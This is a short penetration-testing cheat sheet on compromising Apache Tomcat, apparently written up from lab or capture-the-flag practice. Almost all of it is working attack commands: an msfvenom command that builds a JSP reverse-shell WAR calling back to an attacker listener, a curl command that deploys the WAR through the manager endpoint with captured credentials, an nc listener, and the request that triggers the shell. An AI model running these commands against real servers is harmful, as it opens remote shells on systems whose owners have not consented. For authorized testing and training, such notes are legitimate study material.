Tomcat
Tomcat is like a secondary service usually runs on port 8080
/manager/html
/host-manager/html
tomcat-users.xml # contains usernames and passwords
- Create a malicious .war file deploy it and obtain reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=tun0 LPORT=1234 -f war > shell.war
source : hackingarticles
- Once deployed make a request to
http://targeturi:8080/shellto obtain the reverse shell
- Whenever there is no GUI, the malicious war file can be still uploaded and deployed which will lead to obtaining a reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=tun0 LPORT=1234 -f war > shell.war
# curl --upload-file rev.war 'http://<username>:<password>@<host>:8080/manager/text/deploy?path=/<deploy path>'
curl --upload-file shell.war 'http://tomcat:$3cureP4s5w0r[email protected]:8080/manager/text/deploy?path=/dnoscp'
# listen for a reverse shell
nc -lvnp 1234
# make a request and obtain reverse shell
# curl -L --head http://<host>:8080/deployPath
curl -L --head http://10.129.113.205:8080/dnoscp
Last modified 1yr ago